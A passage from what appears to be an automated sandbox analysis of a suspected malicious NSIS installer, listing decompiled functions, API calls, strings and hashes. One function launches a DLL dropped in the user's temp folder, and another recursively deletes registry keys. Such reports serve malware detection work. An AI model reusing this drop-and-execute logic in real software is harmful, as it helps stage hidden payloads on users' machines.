							 *((char*)(_t28 + 0x79ed60)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x79ed60, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                        0x00404d68
                                        0x00404d74
                                        0x00404d77
                                        0x00404d7d
                                        0x00404d89
                                        0x00404d8c
                                        0x00404d8f
                                        0x00404d95
                                        0x00404d95
                                        0x00404d9b
                                        0x00404da3
                                        0x00404da6
                                        0x00404dc3
                                        0x00404dc7
                                        0x00404dd0
                                        0x00404dd0
                                        0x00404dda
                                        0x00404de3
                                        0x00404def
                                        0x00404df6
                                        0x00404dfa
                                        0x00404dfd
                                        0x00404e10
                                        0x00404e1e
                                        0x00404e1e
                                        0x00404e22
                                        0x00404e24
                                        0x00404e27
                                        0x00000000
                                        0x00404e27
                                        0x00404da8
                                        0x00404db0
                                        0x00404db8
                                        0x00404dbe
                                        0x00000000
                                        0x00404dbe
                                        0x00404db8
                                        0x00404da6
                                        0x00404e31

                                        APIs
                                        • lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                        • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                        • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                        • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: `y
                                        • API String ID: 2531174081-1740403070
                                        • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                        • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
                                        • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                        • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405BFB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00405BFB(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405538(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                        0x00405bfd
                                        0x00405c05
                                        0x00405c19
                                        0x00405c19
                                        0x00405c1f
                                        0x00405c2c
                                        0x00405c2c
                                        0x00405c2d
                                        0x00405c2f
                                        0x00405c33
                                        0x00405c35
                                        0x00405c3e
                                        0x00405c40
                                        0x00405c5a
                                        0x00405c62
                                        0x00405c62
                                        0x00405c67
                                        0x00405c69
                                        0x00405c6b
                                        0x00405c6f
                                        0x00405c70
                                        0x00405c73
                                        0x00405c7b
                                        0x00405c7d
                                        0x00405c81
                                        0x00000000
                                        0x00000000
                                        0x00405c87
                                        0x00405c8c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405c8c
                                        0x00405c91

                                        APIs
                                        • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                        • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                        • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                        • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
                                        • *?|<>/":, xrefs: 00405C43
                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                        • API String ID: 589700163-562438032
                                        • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                        • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
                                        • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                        • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403E0E, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                        0x00403e20
                                        0x00403eb4
                                        0x00000000
                                        0x00403eb4
                                        0x00403e31
                                        0x00403e35
                                        0x00000000
                                        0x00000000
                                        0x00403e3b
                                        0x00403e44
                                        0x00403e47
                                        0x00403e47
                                        0x00403e4d
                                        0x00403e53
                                        0x00403e53
                                        0x00403e5f
                                        0x00403e65
                                        0x00403e6c
                                        0x00403e6f
                                        0x00403e72
                                        0x00403e74
                                        0x00403e74
                                        0x00403e7c
                                        0x00403e82
                                        0x00403e82
                                        0x00403e8c
                                        0x00403e91
                                        0x00403e94
                                        0x00403e99
                                        0x00403e9c
                                        0x00403e9c
                                        0x00403eac
                                        0x00403eac
                                        0x00000000

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                        • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
                                        • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                        • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040166B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E0040166B() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A9A(0xffffffd0);
				 *(_t35 - 8) = E00402A9A(0xffffffdf);
				E004059BF(0x40a018,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x40a018, 0x40901c);
					lstrcatA(0x40a018,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						E00405707( *(_t35 + 8),  *(_t35 - 8));
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401428();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}






                                        0x00401674
                                        0x00401684
                                        0x00401688
                                        0x00401690
                                        0x004016a7
                                        0x004016af
                                        0x004016b8
                                        0x004016b8
                                        0x004016cb
                                        0x004016d7
                                        0x004026da
                                        0x004016ed
                                        0x004016f3
                                        0x004016f8
                                        0x00000000
                                        0x004016f8
                                        0x004016cd
                                        0x004016cd
                                        0x004021e8
                                        0x004021e8
                                        0x004021e8
                                        0x00402932
                                        0x0040293e

                                        APIs
                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,?,000000DF,000000D0), ref: 00401690
                                        • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,?,000000DF,000000D0), ref: 0040169A
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,?,000000DF,000000D0), ref: 004016AF
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,?,000000DF,000000D0), ref: 004016B8
                                          • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ), ref: 00405CA2
                                          • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                          • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                          • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
                                          • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                          • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
                                          • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
                                          • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
                                          • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                          • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                          • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                          • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                          • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                          • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                        • MoveFileA.KERNEL32(?,?), ref: 004016C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                        • String ID: C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll
                                        • API String ID: 2621199633-1768735994
                                        • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                        • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
                                        • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                        • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404627, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00404627(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                        0x00404635
                                        0x00404642
                                        0x00404648
                                        0x00404686
                                        0x00404686
                                        0x00404695
                                        0x0040469c
                                        0x00000000
                                        0x0040469e
                                        0x0040464a
                                        0x00404659
                                        0x00404661
                                        0x00404664
                                        0x00404676
                                        0x0040467c
                                        0x00404683
                                        0x00000000
                                        0x00404683
                                        0x00000000

                                        APIs
                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
                                        • GetMessagePos.USER32 ref: 0040464A
                                        • ScreenToClient.USER32 ref: 00404664
                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                        • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
                                        • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                        • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402BAB, Relevance: 9.0, APIs: 6, Instructions: 48timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
				int _t7;
				int _t15;
				struct HWND__* _t16;

				_t16 = _a4;
				if(_a8 == 0x110) {
					SetTimer(_t16, 1, 0xfa, 0);
					_a8 = 0x113;
					 *0x40b020 = _a16;
				}
				if(_a8 == 0x113) {
					_t15 =  *0x789930; // 0x378da
					_t7 =  *0x79d938; // 0x378de
					if(_t15 >= _t7) {
						_t15 = _t7;
					}
					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
					SetWindowTextA(_t16, 0x7898f0);
					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
					ShowWindow(_t16, 5);
				}
				return 0;
			}






                                        0x00402bb7
                                        0x00402bbf
                                        0x00402bcb
                                        0x00402bd4
                                        0x00402bd7
                                        0x00402bd7
                                        0x00402bdf
                                        0x00402be1
                                        0x00402be7
                                        0x00402bee
                                        0x00402bf0
                                        0x00402bf0
                                        0x00402c09
                                        0x00402c14
                                        0x00402c21
                                        0x00402c29
                                        0x00402c29
                                        0x00402c34

                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
                                        • MulDiv.KERNEL32(000378DA,00000064,000378DE), ref: 00402BF6
                                        • wsprintfA.USER32 ref: 00402C09
                                        • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
                                        • SetDlgItemTextA.USER32 ref: 00402C21
                                        • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: TextWindow$ItemShowTimerwsprintf
                                        • String ID:
                                        • API String ID: 559026099-0
                                        • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                        • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
                                        • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                        • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401E34, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E00401E34() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A9A(_t19);
				_t20 = E00402A9A(0x31);
				_t7 = E00402A9A(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\jones\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll", "%s %s");
				E00401428(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}








                                        0x00401e3c
                                        0x00401e45
                                        0x00401e47
                                        0x00401e4c
                                        0x00401e4d
                                        0x00401e58
                                        0x00401e5a
                                        0x00401e65
                                        0x00401e71
                                        0x00401e7f
                                        0x00401e91
                                        0x004026da
                                        0x004026da
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • wsprintfA.USER32 ref: 00401E5A
                                        • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll, xrefs: 00401E53
                                        • %s %s, xrefs: 00401E4E
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ExecuteShellwsprintf
                                        • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll
                                        • API String ID: 2956387742-367679082
                                        • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                        • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
                                        • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                        • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402ADA, Relevance: 7.6, APIs: 5, Instructions: 51registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t14;

				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
				if(_t14 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						if(E00402ADA(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					return RegDeleteKeyA(_a4, _a8);
				}
				return _t14;
			}






                                        0x00402af5
                                        0x00402afd
                                        0x00402b25
                                        0x00402b0f
                                        0x00402b56
                                        0x00000000
                                        0x00402b5e
                                        0x00402b23
                                        0x00000000
                                        0x00000000
                                        0x00402b23
                                        0x00402b3a
                                        0x00000000
                                        0x00402b46
                                        0x00402b50

                                        APIs
